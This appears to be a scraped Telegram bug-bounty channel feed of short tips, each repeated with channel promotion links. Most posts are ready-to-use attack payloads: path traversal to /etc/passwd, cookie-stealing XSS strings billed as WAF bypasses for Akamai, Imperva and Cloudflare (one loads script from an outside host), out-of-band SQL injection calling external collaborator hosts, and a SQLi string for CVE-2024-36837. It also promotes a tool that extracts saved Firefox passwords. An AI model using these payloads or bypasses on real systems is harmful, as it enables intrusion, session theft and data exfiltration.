Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡3
Bypass dot (.) block in XSS
❌ alert(document.cookie)
✅ alert(cookie)
Some times '
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Some times '
cookie' is a variable declared as 'document.cookie'#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥4❤3
Waf block any
Try HTML injection
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
"</"Try HTML injection
</a> worked...Payload:
</a<noscript>alert(document.cookie</noscript>#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡2🔥2
fuzzuli
💬
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
🔼 Installation:
fuzzuli requires go1.17 to install successfully. Run the following command to install.
💻 Example:
All:
😸 Github
⬇️ Download
🔒
#Scanner #Backup #Files
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
fuzzuli requires go1.17 to install successfully. Run the following command to install.
go install -v github.com/musana/fuzzuli@latest
All:
echo https://fuzzuli.musana.net|fuzzuli -mt mixed
## OR
fuzzuli -h
BugCod3#Scanner #Backup #Files
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍3🔥3⚡2
A quick way to find "all" paths for Next.js websites:
👩💻 javanoscript:
#BugBounty #Tips #JS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
console.log(__BUILD_MANIFEST.sortedPages)console.log(__BUILD_MANIFEST.sortedPages.join('\n'));#BugBounty #Tips #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤3⚡2👍1
LazyDork Tool is Google dorker tool help during google dorking link
🔗 Site
#Google #Dork #Maker
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Google #Dork #Maker
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡5🔥2👌1
XlsNinja: Multi-Vulnerability Scanner
💬
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.
📊 Features:
⚪️ LFI Scanner: Detect Local File Inclusion vulnerabilities.
⚪️ OR Scanner: Identify Open Redirect vulnerabilities.
⚪️ SQL Scanner: Detect SQL Injection vulnerabilities.
⚪️ XSS Scanner: Identify Cross-Site Scripting vulnerabilities.
⚪️ Multi-threaded scanning: Improved performance through multi-threading.
⚪️ Customizable payloads: Adjust payloads to suit specific targets.
⚪️ Success criteria: Modify success detection criteria for specific use cases.
⚪️ User-friendly command-line interface: Simple and intuitive.
⚪️ Save vulnerable URLs: Option to save the results of vulnerable URLs to a file.
🔼 Installation:
😸 Github
⬇️ Download
🔒
#Multi #Vulnerability #Scanner
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.
cd lostools
pip install -r requirements.txt
python xlsniNja.py
BugCod3#Multi #Vulnerability #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡4👍4
Top 15 Vulnerability Scanners🔍 📝
#Top #Vulnerability #Scanners
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Top #Vulnerability #Scanners
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡2🔥2
XSS Bypass Akamai, Imperva and CloudFlare
Payload:
#XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/Root_Exploit
Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>#XSS #Payload
📣 T.me/BugCod3
📣 T.me/Root_Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6⚡3❤2👍2🌚2
Add to your wordlist:
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤5⚡3🔥3👍1
WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯
#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Lead to 30 XSS in large BBP🤯
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤5🔥5⚡3👍1
Out-of-Band SQL Injection
Payload:
#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\http://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))
'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'http://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤3👍3🔥2⚡1
Extract all endpoints from a JS File and take your bug 🐞
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥5❤4👍3⚡1
Firefox Decrypt
💬
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profiles
💻 Usage:
Github
⬇️ Download
🔒
#Python #Firefox #Extract #Password #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
💬
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profiles
💻 Usage:
cd firefox_decrypt
python firefox_decrypt.py
Github
⬇️ Download
🔒
BugCod3#Python #Firefox #Extract #Password #Tools
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
⚡4❤3🔥3
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/Root_Exploit
📣 T.me/BugCod3
❤3⚡2🔥2
SQLI Injection
CVE: 2024-36837
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
CVE: 2024-36837
Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2🔥2
JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤2🔥2👍1
XSS in
Payload:
#BugBounty #Tips #XSS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Office.com. The + made a difference. Payload:
`'>+<noscript>alert()</noscript>`
#BugBounty #Tips #XSS
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🔥6❤3
This media is not supported in your browser
VIEW IN TELEGRAM
SubCerts
💬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.
📊 Features:
⚪️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.
⚪️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using
returns:
⚫️ HTTP status codes
⚫️ Page noscripts
⚫️ Silent output for clean and organized results
⚪️ Automation: Run the tool with a simple command and get results efficiently without manual effort.
⚪️ Flexible Output: Optionally save the extracted subdomains and
🔼 Installation:
💻 Usage:
To run SubCerts for a domain and save the results to a file:
😸 Github
⬇️ Download
🔒
#BugBounty #SubDomain #certificate
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.
httpx and returns:
httpx results to a file for later review.cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h
To run SubCerts for a domain and save the results to a file:
./subcerts.sh -u example.com --output results.txt
BugCod3#BugBounty #SubDomain #certificate
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡3🔥3